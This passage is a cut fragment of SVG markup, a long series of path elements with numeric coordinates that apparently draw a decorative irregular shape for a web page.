d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n        <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n        <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n        <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n        <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n        <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n        <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n        <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n        <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n        <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n        <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n        <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n        <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n        <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n        <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n        <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n        <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n        <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n        <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n        <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n        <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n        <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n        <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n        <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n        <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n        <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n        <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n        <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n        <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n        <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n        <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n        <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n        <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n        <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n        <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n        <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n        <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n        <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n        <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n        <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n        <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n        <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n        <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n        <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n        <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n        <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n        <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n        <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n        <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n        <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n        <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n        <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n        <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n        <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n        <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n        <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n        <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n        <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n        <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n        <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n        <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n        <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n        <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n        <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n        <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n        <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n        <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n        <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n        <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n        <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n        <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n        <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n        <path d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n        <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n        <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n        <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n        <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n        <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n        <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n        <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n        <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n        <path d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n        <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3,7,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.